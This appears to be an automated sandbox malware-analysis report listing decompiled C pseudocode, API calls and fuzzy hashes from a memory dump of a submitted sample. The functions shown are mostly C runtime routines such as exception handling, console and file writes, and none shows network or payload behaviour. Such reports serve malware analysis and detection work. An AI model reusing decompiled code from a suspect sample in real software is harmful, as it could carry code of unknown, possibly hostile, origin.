                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 70%
                                                                                                                          			E002578EB(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t52;
				signed int _t53;
				intOrPtr _t54;
				signed int _t58;
				signed int _t61;
				intOrPtr _t71;
				signed int _t75;
				signed int _t79;
				signed int _t81;
				signed int _t84;
				signed int _t85;
				signed int _t97;
				signed int* _t98;
				signed char* _t101;
				signed int _t107;
				void* _t111;

				_push(0x10);
				_push(0x263388);
				E0024D940(__ebx, __edi, __esi);
				_t75 = 0;
				_t52 =  *(_t111 + 0x10);
				_t81 = _t52[1];
				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
					L30:
					_t53 = 0;
					__eflags = 0;
					goto L31;
				} else {
					_t97 = _t52[2];
					if(_t97 != 0 ||  *_t52 < 0) {
						_t84 =  *_t52;
						_t107 =  *(_t111 + 0xc);
						if(_t84 >= 0) {
							_t107 = _t107 + 0xc + _t97;
						}
						 *(_t111 - 4) = _t75;
						_t101 =  *(_t111 + 0x14);
						if(_t84 >= 0 || ( *_t101 & 0x00000010) == 0) {
							L10:
							_t54 =  *((intOrPtr*)(_t111 + 8));
							__eflags = _t84 & 0x00000008;
							if((_t84 & 0x00000008) == 0) {
								__eflags =  *_t101 & 0x00000001;
								if(( *_t101 & 0x00000001) == 0) {
									_t84 =  *(_t54 + 0x18);
									__eflags = _t101[0x18] - _t75;
									if(_t101[0x18] != _t75) {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												__eflags =  *_t101 & 0x00000004;
												_t79 = 0;
												_t75 = (_t79 & 0xffffff00 | ( *_t101 & 0x00000004) != 0x00000000) + 1;
												__eflags = _t75;
												 *(_t111 - 0x20) = _t75;
												goto L29;
											}
										}
									} else {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												E0024F6F0(_t107, E0024DD80(_t84,  &(_t101[8])), _t101[0x14]);
												goto L29;
											}
										}
									}
								} else {
									__eflags =  *(_t54 + 0x18);
									if( *(_t54 + 0x18) == 0) {
										goto L32;
									} else {
										__eflags = _t107;
										if(_t107 == 0) {
											goto L32;
										} else {
											E0024F6F0(_t107,  *(_t54 + 0x18), _t101[0x14]);
											__eflags = _t101[0x14] - 4;
											if(_t101[0x14] == 4) {
												__eflags =  *_t107;
												if( *_t107 != 0) {
													_push( &(_t101[8]));
													_push( *_t107);
													goto L21;
												}
											}
											goto L29;
										}
									}
								}
							} else {
								_t84 =  *(_t54 + 0x18);
								goto L12;
							}
						} else {
							_t71 =  *0x265dcc;
							 *((intOrPtr*)(_t111 - 0x1c)) = _t71;
							if(_t71 == 0) {
								goto L10;
							} else {
								 *0x267000();
								_t84 =  *((intOrPtr*)(_t111 - 0x1c))();
								L12:
								if(_t84 == 0 || _t107 == 0) {
									L32:
									E00251C1C(_t75, _t84, _t97, _t107);
									asm("int3");
									_push(8);
									_push(0x2633a8);
									E0024D940(_t75, _t101, _t107);
									_t98 =  *(_t111 + 0x10);
									_t85 =  *(_t111 + 0xc);
									__eflags =  *_t98;
									if(__eflags >= 0) {
										_t103 = _t85 + 0xc + _t98[2];
										__eflags = _t85 + 0xc + _t98[2];
									} else {
										_t103 = _t85;
									}
									 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
									_t108 =  *(_t111 + 0x14);
									_push( *(_t111 + 0x14));
									_push(_t98);
									_push(_t85);
									_t77 =  *((intOrPtr*)(_t111 + 8));
									_push( *((intOrPtr*)(_t111 + 8)));
									_t58 = E002578EB(_t77, _t103, _t108, __eflags) - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										_t61 = E0025737D(_t103, _t108[0x18], E0024DD80( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])));
									} else {
										_t61 = _t58 - 1;
										__eflags = _t61;
										if(_t61 == 0) {
											_t61 = E0025738D(_t103, _t108[0x18], E0024DD80( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])), 1);
										}
									}
									 *(_t111 - 4) = 0xfffffffe;
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t61;
								} else {
									 *_t107 = _t84;
									_push( &(_t101[8]));
									_push(_t84);
									L21:
									 *_t107 = E0024DD80();
									L29:
									 *(_t111 - 4) = 0xfffffffe;
									_t53 = _t75;
									L31:
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t53;
								}
							}
						}
					} else {
						goto L30;
					}
				}
			}



















                                                                                                                          0x002578eb
                                                                                                                          0x002578ed
                                                                                                                          0x002578f2
                                                                                                                          0x002578f7
                                                                                                                          0x002578f9
                                                                                                                          0x002578fc
                                                                                                                          0x00257901
                                                                                                                          0x00257a11
                                                                                                                          0x00257a11
                                                                                                                          0x00257a11
                                                                                                                          0x00000000
                                                                                                                          0x00257910
                                                                                                                          0x00257910
                                                                                                                          0x00257915
                                                                                                                          0x0025791f
                                                                                                                          0x00257921
                                                                                                                          0x00257926
                                                                                                                          0x0025792b
                                                                                                                          0x0025792b
                                                                                                                          0x0025792d
                                                                                                                          0x00257930
                                                                                                                          0x00257935
                                                                                                                          0x00257957
                                                                                                                          0x00257957
                                                                                                                          0x0025795a
                                                                                                                          0x0025795d
                                                                                                                          0x0025797b
                                                                                                                          0x0025797e
                                                                                                                          0x002579bd
                                                                                                                          0x002579c0
                                                                                                                          0x002579c3
                                                                                                                          0x002579e8
                                                                                                                          0x002579ea
                                                                                                                          0x00000000
                                                                                                                          0x002579ec
                                                                                                                          0x002579ec
                                                                                                                          0x002579ee
                                                                                                                          0x00000000
                                                                                                                          0x002579f0
                                                                                                                          0x002579f0
                                                                                                                          0x002579f5
                                                                                                                          0x002579f9
                                                                                                                          0x002579f9
                                                                                                                          0x002579fa
                                                                                                                          0x00000000
                                                                                                                          0x002579fa
                                                                                                                          0x002579ee
                                                                                                                          0x002579c5
                                                                                                                          0x002579c5
                                                                                                                          0x002579c7
                                                                                                                          0x00000000
                                                                                                                          0x002579c9
                                                                                                                          0x002579c9
                                                                                                                          0x002579cb
                                                                                                                          0x00000000
                                                                                                                          0x002579cd
                                                                                                                          0x002579de
                                                                                                                          0x00000000
                                                                                                                          0x002579e3
                                                                                                                          0x002579cb
                                                                                                                          0x002579c7
                                                                                                                          0x00257980
                                                                                                                          0x00257980
                                                                                                                          0x00257984
                                                                                                                          0x00000000
                                                                                                                          0x0025798a
                                                                                                                          0x0025798a
                                                                                                                          0x0025798c
                                                                                                                          0x00000000
                                                                                                                          0x00257992
                                                                                                                          0x00257999
                                                                                                                          0x002579a1
                                                                                                                          0x002579a5
                                                                                                                          0x002579a7
                                                                                                                          0x002579aa
                                                                                                                          0x002579af
                                                                                                                          0x002579b0
                                                                                                                          0x00000000
                                                                                                                          0x002579b0
                                                                                                                          0x002579aa
                                                                                                                          0x00000000
                                                                                                                          0x002579a5
                                                                                                                          0x0025798c
                                                                                                                          0x00257984
                                                                                                                          0x0025795f
                                                                                                                          0x0025795f
                                                                                                                          0x00000000
                                                                                                                          0x0025795f
                                                                                                                          0x0025793c
                                                                                                                          0x0025793c
                                                                                                                          0x00257941
                                                                                                                          0x00257946
                                                                                                                          0x00000000
                                                                                                                          0x00257948
                                                                                                                          0x0025794a
                                                                                                                          0x00257953
                                                                                                                          0x00257962
                                                                                                                          0x00257964
                                                                                                                          0x00257a23
                                                                                                                          0x00257a23
                                                                                                                          0x00257a28
                                                                                                                          0x00257a29
                                                                                                                          0x00257a2b
                                                                                                                          0x00257a30
                                                                                                                          0x00257a35
                                                                                                                          0x00257a38
                                                                                                                          0x00257a3b
                                                                                                                          0x00257a3e
                                                                                                                          0x00257a47
                                                                                                                          0x00257a47
                                                                                                                          0x00257a40
                                                                                                                          0x00257a40
                                                                                                                          0x00257a40
                                                                                                                          0x00257a4a
                                                                                                                          0x00257a4e
                                                                                                                          0x00257a51
                                                                                                                          0x00257a52
                                                                                                                          0x00257a53
                                                                                                                          0x00257a54
                                                                                                                          0x00257a57
                                                                                                                          0x00257a60
                                                                                                                          0x00257a60
                                                                                                                          0x00257a63
                                                                                                                          0x00257a99
                                                                                                                          0x00257a65
                                                                                                                          0x00257a65
                                                                                                                          0x00257a65
                                                                                                                          0x00257a68
                                                                                                                          0x00257a7f
                                                                                                                          0x00257a7f
                                                                                                                          0x00257a68
                                                                                                                          0x00257a9e
                                                                                                                          0x00257aa8
                                                                                                                          0x00257ab4
                                                                                                                          0x00257972
                                                                                                                          0x00257972
                                                                                                                          0x00257977
                                                                                                                          0x00257978
                                                                                                                          0x002579b2
                                                                                                                          0x002579b9
                                                                                                                          0x002579fd
                                                                                                                          0x002579fd
                                                                                                                          0x00257a04
                                                                                                                          0x00257a13
                                                                                                                          0x00257a16
                                                                                                                          0x00257a22
                                                                                                                          0x00257a22
                                                                                                                          0x00257964
                                                                                                                          0x00257946
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00257915

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.309791482.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.309786839.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309819433.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309828993.0000000000264000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309836770.0000000000266000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309963168.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AdjustPointer
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1740715915-0
                                                                                                                          • Opcode ID: 13fa5460c8d1a3b90bf1c76005fe34dacbc322fb69033ca9e0b4ef14e47bb744
                                                                                                                          • Instruction ID: 9fcdcb90a5ac736e4389e73353b30f5f0efbfece4acc0ce3fdae4e1387e8102f
                                                                                                                          • Opcode Fuzzy Hash: 13fa5460c8d1a3b90bf1c76005fe34dacbc322fb69033ca9e0b4ef14e47bb744
                                                                                                                          • Instruction Fuzzy Hash: 1851E3726A8203AFDB298F10E841B7E73A5EF44712F24452DEC4557291D731EE78CBA8
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0024B2C0 Relevance: 6.1, APIs: 4, Instructions: 114COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.309791482.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.309786839.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309819433.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309828993.0000000000264000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309836770.0000000000266000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309963168.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ColorObjectSelect$Text
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2688426544-0
                                                                                                                          • Opcode ID: b35604d44f925719087848f383a91985a3cd1ace462e4fa04c255c8b0f8bedc7
                                                                                                                          • Instruction ID: 8f108c1722386722f96c8d608e04f521180d677a65dc86e5d9d201383a63e4b9
                                                                                                                          • Opcode Fuzzy Hash: b35604d44f925719087848f383a91985a3cd1ace462e4fa04c255c8b0f8bedc7
                                                                                                                          • Instruction Fuzzy Hash: 1A518074A14208DFCB04DF68D598AACBBF1FF48314F1584A9E88A9B351DB31EA91DF41
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00248D90 Relevance: 6.1, APIs: 4, Instructions: 70windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.309791482.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.309786839.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309819433.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309828993.0000000000264000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309836770.0000000000266000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309963168.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Menu$CreateLongPopupSystemWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3388415271-0
                                                                                                                          • Opcode ID: 68d95082a9d8aa0676554e50952990e03d62b205727737bbca33c6227845e0c2
                                                                                                                          • Instruction ID: f9712923bae4db1cb5f949bbd1ce95bf56cabcbe1f0b14b54b07319729d32c0b
                                                                                                                          • Opcode Fuzzy Hash: 68d95082a9d8aa0676554e50952990e03d62b205727737bbca33c6227845e0c2
                                                                                                                          • Instruction Fuzzy Hash: 8E31A574A14204DFDB44EF68D588B9DBBF0BF48311F0580A9E889DB351DB749A94CF42
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00258FAD Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00258FAD(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x2648b0, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E00259021();
					E00259002();
					_t13 = WriteConsoleW( *0x2648b0, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}




                                                                                                                          0x00258fca
                                                                                                                          0x00258fce
                                                                                                                          0x00258fdb
                                                                                                                          0x00258fe0
                                                                                                                          0x00258ffb
                                                                                                                          0x00258ffb
                                                                                                                          0x00259001

                                                                                                                          APIs
                                                                                                                          • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,00258B12,?,00000001,?,?,?,00256DFE,?,?,00000000), ref: 00258FC4
                                                                                                                          • GetLastError.KERNEL32(?,00258B12,?,00000001,?,?,?,00256DFE,?,?,00000000,?,?,?,00256749,?), ref: 00258FD0
                                                                                                                            • Part of subcall function 00259021: CloseHandle.KERNEL32(FFFFFFFE,00258FE0,?,00258B12,?,00000001,?,?,?,00256DFE,?,?,00000000,?,?), ref: 00259031
                                                                                                                          • ___initconout.LIBCMT ref: 00258FE0
                                                                                                                            • Part of subcall function 00259002: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00258F9E,00258AFF,?,?,00256DFE,?,?,00000000,?), ref: 00259015
                                                                                                                          • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,00258B12,?,00000001,?,?,?,00256DFE,?,?,00000000,?), ref: 00258FF5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.309791482.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.309786839.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309819433.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309828993.0000000000264000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309836770.0000000000266000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309963168.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2744216297-0
                                                                                                                          • Opcode ID: fe1093ec2b9f3252f4615cbedc2600b7f47416ba4478439dcbd8f151f59b521d
                                                                                                                          • Instruction ID: 3f19111c9b088cd86dfe80f140a7e1d1623d3d14663b8c4474e7285c9921fd72
                                                                                                                          • Opcode Fuzzy Hash: fe1093ec2b9f3252f4615cbedc2600b7f47416ba4478439dcbd8f151f59b521d
                                                                                                                          • Instruction Fuzzy Hash: B4F0C036510155BFCF223FD5FC09A997F66FB093A2B448450FE1996170CAB2D8709BD4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00247970 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.309791482.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.309786839.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309819433.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309828993.0000000000264000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309836770.0000000000266000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309963168.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _strlen
                                                                                                                          • String ID: (
                                                                                                                          • API String ID: 4218353326-3887548279
                                                                                                                          • Opcode ID: 8bee944b328832abc74aee089c45a625e8aaa70671cbe393a5150ab8f0671009
                                                                                                                          • Instruction ID: 9b1a61a2195b5e3e7a0c5bcd15da29cf9583b7bde2ee145f694e52ee8d65ab68
                                                                                                                          • Opcode Fuzzy Hash: 8bee944b328832abc74aee089c45a625e8aaa70671cbe393a5150ab8f0671009
                                                                                                                          • Instruction Fuzzy Hash: 4D51E471914609ABCB19DF58C886BADBBB0FB44314F04C969E869DB390D334EAA4CF45
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0025775B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 93COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 47%
                                                                                                                          			E0025775B(void* __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr _a16, signed int* _a20, signed int _a24, signed int _a28, signed char _a32) {
				void* __ebx;
				void* __esi;
				void* _t37;
				signed int _t46;
				void* _t52;
				void* _t54;
				signed int* _t55;
				void* _t58;
				void* _t60;
				intOrPtr* _t62;

				E00252117(_a12);
				_pop(_t54);
				_t37 = E00251CAE(_t52, _t54, __edx, _t60);
				_t55 = _a20;
				_t58 = _a4;
				if( *((intOrPtr*)(_t37 + 0x20)) != 0 ||  *_t58 == 0xe06d7363 ||  *_t58 == 0x80000026 || ( *_t55 & 0x1fffffff) < 0x19930522 || (_t55[8] & 0x00000001) == 0) {
					if(( *(_t58 + 4) & 0x00000066) == 0) {
						if(_t55[3] != 0) {
							L14:
							if( *_t58 != 0xe06d7363 ||  *((intOrPtr*)(_t58 + 0x10)) < 3 ||  *((intOrPtr*)(_t58 + 0x14)) <= 0x19930522) {
								L19:
								E00257AC2(_t58, _t58, _a8, _a12, _a16, _t55, _a32, _a24, _a28);
								goto L20;
							} else {
								_t62 =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0x1c)) + 8));
								if(_t62 == 0) {
									goto L19;
								}
								 *0x267000(_t58, _a8, _a12, _a16, _t55, _a24, _a28, _a32 & 0x000000ff);
								return  *_t62();
							}
						}
						_t46 =  *_t55 & 0x1fffffff;
						if(_t46 < 0x19930521 || _t55[7] == 0) {
							if(_t46 < 0x19930522 || (_t55[8] >> 0x00000002 & 0x00000001) == 0) {
								goto L20;
							} else {
								goto L14;
							}
						} else {
							goto L14;
						}
					}
					if(_t55[1] != 0 && _a24 == 0) {
						L0025735A(_a8, _a16, _t55);
					}
					goto L20;
				} else {
					L20:
					return 1;
				}
			}













                                                                                                                          0x00257764
                                                                                                                          0x00257769
                                                                                                                          0x0025776a
                                                                                                                          0x0025776f
                                                                                                                          0x00257774
                                                                                                                          0x00257784
                                                                                                                          0x002577ac
                                                                                                                          0x002577d7
                                                                                                                          0x002577f7
                                                                                                                          0x002577fd
                                                                                                                          0x00257839
                                                                                                                          0x0025784d
                                                                                                                          0x00000000
                                                                                                                          0x0025780a
                                                                                                                          0x0025780d
                                                                                                                          0x00257812
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0025782c
                                                                                                                          0x00000000
                                                                                                                          0x00257834
                                                                                                                          0x002577fd
                                                                                                                          0x002577db
                                                                                                                          0x002577e2
                                                                                                                          0x002577eb
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x002577e2
                                                                                                                          0x002577b1
                                                                                                                          0x002577c7
                                                                                                                          0x002577cc
                                                                                                                          0x00000000
                                                                                                                          0x00257855
                                                                                                                          0x00257855
                                                                                                                          0x00000000
                                                                                                                          0x00257857

                                                                                                                          APIs
                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00257764
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.309791482.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.309786839.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309819433.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309828993.0000000000264000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309836770.0000000000266000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309963168.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ___except_validate_context_record
                                                                                                                          • String ID: csm$csm
                                                                                                                          • API String ID: 3493665558-3733052814
                                                                                                                          • Opcode ID: 561f79f9dfc6028a807b603e8f9aaf7097509357b6f0021318705cb54346aa91
                                                                                                                          • Instruction ID: 3c12799ec0a4814981dcf76ecc4c5c5f6456ac5b317cfd5b71cf36238cd81a98
                                                                                                                          • Opcode Fuzzy Hash: 561f79f9dfc6028a807b603e8f9aaf7097509357b6f0021318705cb54346aa91
                                                                                                                          • Instruction Fuzzy Hash: 6131E4324A4216EFCF228F55EC0C96A7B66FF08316B18455AFC5409111C332CC79EB85
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00244980 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 92COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.309791482.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.309786839.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309819433.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309828993.0000000000264000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309836770.0000000000266000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309963168.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: EnumFamiliesFont
                                                                                                                          • String ID: 1$\
                                                                                                                          • API String ID: 2229041460-1239263948
                                                                                                                          • Opcode ID: 05749a8c248f143b30149b7d823d66a057c2da9e47beda654c5944e3772849cd
                                                                                                                          • Instruction ID: 295480414e1d2a63ee2e9d5e727ce2f3744e6c92058b5e9da5aca69188540567
                                                                                                                          • Opcode Fuzzy Hash: 05749a8c248f143b30149b7d823d66a057c2da9e47beda654c5944e3772849cd
                                                                                                                          • Instruction Fuzzy Hash: A9419D74A04208DFDB14DF58C098BAABBF0FF48354F15C0AAE8898B362D775A995CF51
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 002474C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.309791482.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.309786839.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309819433.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309828993.0000000000264000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309836770.0000000000266000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309963168.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorFileLastWrite
                                                                                                                          • String ID: write failed: %lu
                                                                                                                          • API String ID: 442123175-171016427
                                                                                                                          • Opcode ID: ea915a47af31a069eddcb8b9c6039d911e6ad1e270014414793cf94a7a7863d7
                                                                                                                          • Instruction ID: 9d74a581ec5dbe4f3dd19aece85fb14ff4654b35adaafb73e0a5c77ebfd3ea43
                                                                                                                          • Opcode Fuzzy Hash: ea915a47af31a069eddcb8b9c6039d911e6ad1e270014414793cf94a7a7863d7
                                                                                                                          • Instruction Fuzzy Hash: 8C31E6B05083459FCB04DF18D488AAA7BE5EF44354F458A69ECA98B391D370E9A4CB92
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 002475F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.309791482.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.309786839.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309819433.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309828993.0000000000264000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309836770.0000000000266000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309963168.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorFileLastWrite
                                                                                                                          • String ID: write failed: %lu
                                                                                                                          • API String ID: 442123175-171016427
                                                                                                                          • Opcode ID: e8f5f98ded0ca7af7655fa1fdcfd760ce2241ffe3b6b828af6cbbafa1652dc3b
                                                                                                                          • Instruction ID: 3df18313fff453d4e670fa9fb6fe94e3154d0985ff70328d6dcefd8e8045b086
                                                                                                                          • Opcode Fuzzy Hash: e8f5f98ded0ca7af7655fa1fdcfd760ce2241ffe3b6b828af6cbbafa1652dc3b
                                                                                                                          • Instruction Fuzzy Hash: B01109705083059FC704DF1CD488B9A7BE6EB44364F46CA69E8998B391D3709994CB92
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Execution Graph

